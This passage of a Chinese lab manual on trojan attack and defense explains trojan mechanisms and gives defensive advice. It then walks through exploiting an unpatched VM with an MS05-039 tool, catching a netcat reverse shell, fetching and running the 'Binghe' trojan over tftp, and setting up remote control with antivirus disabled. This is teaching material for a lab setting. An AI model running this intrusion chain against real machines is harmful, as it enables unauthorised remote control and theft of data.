实验指导5：木马攻击与防范实验指导书

第1页共116页实验指导5木马攻击与防范实验1.实验目的理解和掌握木马传播和运行的机制，掌握检查和删除木马的技巧，学会防御木马的相关知识，加深对木马的安全防范意识。2.预备知识2.1木马及木马技术的介绍（1）木马概念介绍很多人把木马看得很神秘，其实，木马就是在用户不知道的情况下被植入用户计算机，用来获取用户计算机上敏感信息（如用户口令，个人隐私等）或使攻击者可以远程控制用户主机的一个客户服务程序。这种客户/服务模式的原理是一台主机提供服务（服务器），另一台主机使用服务（客户机）。作为服务器的主机一般会打开一个默认的端口并进行监听（Listen），如果有客户机向服务器的这一端口提出连接请求（ConnectRequest），服务器上的相应守护进程就会自动运行，来应答客户机的请求。通常来说，被控制端相当于一台服务器，控制端则相当于一台客户机，被控制端为控制端提供预定的服务。（2）木马的反弹端口技术由于防火墙对于进入的链接往往会进行非常严格的过滤，但是对于连出的链接却疏于防范。于是，与一般的木马相反，反弹端口型木马的服务端(被控制端)使用主动端口，客户端(控制端)使用被动端口。木马定时监测控制端的存在，发现控制端上线立即弹出端口主动连结控制端打开的主动端口；为了隐蔽起见，控制端的被动端口一般开在80，这样，即使用户使用端口扫描软件检查自己的端口，发现的也是类似TCPUserIP:1026ControllerIP:80ESTABLISHED的情况，稍微疏忽一点，你就会以为是自己在浏览网页。（3）线程插入技术木马程序的攻击性有了很大的加强，在进程隐藏方面，做了较大的改动，不再采用独立的EXE可执行文件形式，而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等。这样木马的攻击性和隐藏性就大大增强了。2.2木马攻击原理特洛伊木马是一个程序，它驻留在目标计算机里，可以随计算机自动启动并在某一端口进行侦听，在对接收的数据识别后，对目标计算机执行特定的操作。第2页共116页木马，其实质就是一个通过端口进行通信的网络客户/服务程序。（1）基本概念网络客户/服务模式的原理是一台主机提供服务(服务器)，另一台主机接受服务(客户机)。作为服务器的主机一般会打开一个默认的端口并进行监听(Listen)，如果有客户机向服务器的这一端口提出连接请求(ConnectRequest)，服务器上的相应程序就会自动运行，来应答客户机的请求，这个程序称为守护进程(UNIX的术语，不过已经被移植到了MS系统上)。对于特洛伊木马，被控制端就成为一台服务器，控制端则是一台客户机，G_server.exe是守护进程，G_client是客户端应用程序。（2）实现木马的控制功能由于Win98开放了所有的权限给用户，因此，以用户权限运行的木马程序几乎可以控制一切，下面仅对木马的主要功能进行简单的概述，主要是使用WindowsAPI函数。①远程监控(控制对方鼠标、键盘，并监视对方屏幕)keybd_event模拟一个键盘动作。mouse_event模拟一次鼠标事件mouse_event(dwFlags，dx，dy，cButtons，dwExtraInfo)dwFlags:MOUSEEVENTF_ABSOLUTE指定鼠标坐标系统中的一个绝对位置MOUSEEVENTF_MOVE移动鼠标MOUSEEVENTF_LEFTDOWN模拟鼠标左键按下MOUSEEVENTF_LEFTUP模拟鼠标左键抬起MOUSEEVENTF_RIGHTDOWN模拟鼠标右键按下MOUSEEVENTF_RIGHTUP模拟鼠标右键按下dx，dy:MOUSEEVENTF_ABSOLUTE中的鼠标坐标。②记录各种口令信息keylogbegin：将击键记录在一个文本文件里，同时还记录执行输入的窗口名。③获取系统信息a.取得计算机名GetComputerNameb.更改计算机名SetComputerNamec.当前用户GetUserNamed.系统路径e.取得系统版本第3页共116页f.当前显示分辨率④限制系统功能a.远程关机或重启计算机，使用WinAPI中的如下函数可以实现。ExitWindowsEx(UINTuFlags，DWORDdwReserved)当uFlags=EWX_LOGOFF中止进程，然后注销=EWX_SHUTDOWN关掉系统但不关电源=EWX_REBOOT重新引导系统=EWX_FORCE强迫中止没有响应的进程=EWX_POWERDOWN关掉系统及关闭电源b.锁定鼠标，ClipCursor(lpRectAsRECT)可以将指针限制到指定区域，或者用ShowCursor(FALSE)把鼠标隐藏起来也可以，RECT是定义的一个矩形。c.让对方掉线RasHangUpd.终止进程ExitProcesse.关闭窗口利用FindWindow函数找到窗口并利用SendMessage函数关闭窗口⑤远程文件操作删除文件：Filedelete拷贝文件：Filecopy共享文件：Exportlist（列出当前共享的驱动器、目录、权限及共享密码）⑥注册表操作在VB中只要SetRegEdit=CreateObject（WScript.Shell)就可以使用以下的注册表功能：删除键值:RegEdit.RegDeleteRegKey增加键值:RegEdit.WriteRegKey，RegValue获取键值:RegEdit.RegRead(Value)2.3木马的防范建议A.不要随意打开来历不明的邮件现在许多木马都是通过邮件来传播的，当你收到来历不明的邮件时，请不要打开，应尽快删除。并加强邮件监控系统，拒收垃圾邮件。B.不要随意下载来历不明的软件最好是在一些知名的网站下载软件，不要下载和运行来历不明的软件。在安装软件的同时最好用杀毒软件查看有没有病毒，之后才进行安装。第4页共116页C.及时修补漏洞和关闭可疑的端口一般木马都是通过漏洞在系统上打开端口留下后门，以便上传木马文件和执行代码，在把漏洞修补上的同时，需要对端口进行检查，把可疑的端口关闭。D.尽量少用共享文件夹如果必须使用共享文件夹，则最好设置帐号和密码保护。注意千万不要将系统目录设置成共享，最好将系统下默认共享的目录关闭。Windows系统默认情况下将目录设置成共享状态，这是非常危险的。E.运行实时监控程序在上网时最好运行反木马实时监控程序和个人防火墙，并定时对系统进行病毒检查。F.经常升级系统和更新病毒库。3.实验环境1）预备知识要求了解网络的基本知识；熟练使用windows操作系统；充分理解木马攻击原理；熟悉缓冲溢出攻击。2）下载和运行木马软件期间，请关闭杀毒软件的自动防护功能以及防火墙，否则程序会被当作病毒而强行终止。3.1运行环境1）需要下载的其它的工具软件有：tftpd32.exe：tftp服务程序，用来传输“冰河”木马服务端程序nc.exe:缓冲溢出攻击反向连接服务程序（参见“缓冲区溢出攻击与防范实验”）；Ms05039.exe:缓冲溢出攻击工具（参见“缓冲区溢出攻击与防范实验”）；冰河木马.exe:冰河木马程序；gwboy092.exe：“广外男生”木马程序。2）本实验需要用到虚拟机，因此每台实验主机都通过安装软件WMwareWorkstation分割出虚拟机。真实主机P1的配置为：操作系统Windows2000server或者windowsxpsp2，并且安装ms05-039.exe缓冲区溢出攻击软件，“冰河”木马，“广外男生”木马。第5页共116页虚拟机P2配置为：操作系统Windows2000Server（没有打补丁，存在ms05039漏洞，并且安装了IIS组件）。3）实验环境拓扑如图1所示：图1实验网络拓扑图请根据实验环境将IP地址填入下表，攻防实验服务器IPP1:本机IPP2:本机上的虚拟机IPP3:表1实验IP实验中，可把真实机P2作为攻击机，安装上“冰河”木马程序，ms05039.exe，nc.exe，tftpd32.exe和“广外男生”；虚拟机P3作为被攻击主机，安装IIS组件。4.实验内容和步骤4.1实验任务一：“冰河”木马本实验需要把真实主机作为攻击机，虚拟机作为靶机。即首先利用ms05039溢出工具入侵虚拟机，然后利用“冰河”木马实现对虚拟机的完全控制。最后对木马进行查杀。A.“冰河”使用：第6页共116页冰河是一个基于TCP/IP协议和Windows操作系统的网络工具，所以首先应确保该协议已被安装且网络连接无误，然后配置服务器程序(如果不进行配置则取默认设置)，并在欲监控的计算机上运行服务器端监控程序即可。主要文件包括：a.G_Server.exe:被监控端后台监控程序(运行一次即自动安装，可任意改名)，在安装前可以先通过“G_Client”的配置本地服务器程序功能进行一些特殊配置，例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等)；b.G_Client.exe:监控端执行程序，用于监控远程计算机和配置服务器程序。具体功能操作包括：a.添加主机：将被监控IP地址添加至主机列表，同时设置好访问口令及端口，设置将保存在Operate.ini文件中，以后不必重输。如果需要修改设置，可以重新添加该主机，或在主界面工具栏内重新输入访问口令及端口并保存设置。b.删除主机：将被监控端IP地址从主机列表中删除。c.自动搜索：搜索指定子网内安装有冰河的计算机。d.查看屏幕：查看被监控端屏幕。e.屏幕控制：远程模拟鼠标及键盘输入。f.“冰河”信使：点对点聊天室。g.修改远程配置：在线修改访问口令，监听端口等服务器程序设置，不需要重新上传整个文件，修改后立即生效。B.在对“冰河”有所了解之后，我们进入攻防实验阶段——使用“冰河”对目标计算机进行控制：在目标主机（虚拟机）上植入木马，即在此主机上运行G_Sever，作为服务器端；在攻击机上运行G_Client，作为控制端。分别运行这两个.exe文件后，我们进入控制端主界面，按照以下步骤来实现对目标主机的控制。步骤1：入侵准备工作1）下载和安装木马软件前，关闭杀毒软件的自动防护功能，避免程序会被当作病毒而强行终止。2）运行G_CLIENT.EXE，如图2；第7页共116页图2“冰河”运行主界面3）选择菜单“设置”-“配置服务程序”，如图3；图3设置木马服务4）设置访问口令为“1234567”，其它为默认值，点击“确定”生成木马的服务端程序G_SERVER.EXE。5）将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:\攻防\tftp32，如图4。第8页共116页图4将G_SERVER.EXE拷贝到目录C:\攻防\tftp326）运行tftpd32.exe，如图5。保持此程序一直开启，用于等待攻击成功后传输木马服务程序。图5tftp服务运行步骤2：进行攻击，将木马放置在被攻击端1)对靶机P3进行攻击，首先运行nc-vv-l-p99接着再开一个dos窗口，运行ms05039192.168.20.23192.168.20.1991(注意：此次IP地址请根据实际IP地址修改)2)攻击成功后，在运行nc-vv-l-p99的dos窗口中出现如图6提示，若攻击不成功请参照“缓冲区溢出攻击与防范实验”，再次进行攻击。第9页共116页图6攻击成功示意3）在此窗口中运行tftp-i192.168.20.1getg_server.exe将木马服务程序G_server.exe上传到靶机P3上，并直接输入g_server.exe使之运行，如图7。图7上载木马程序并运行步骤3：运行木马客户程序控制远程主机1）打开程序端程序，单击快捷工具栏中的“添加主机”按扭，如图8所示。第10页共116页“显示名称”：填入显示在主界面的名称“target”“主机地址”：填入服务器端主机的IP地址“192.168.20.23”。“访问口令”：填入每次访问主机的密码，这里输入“1234567”。“监听端口”：“冰河”默认的监听端口是7626，控制端可以修改它以绕过防火墙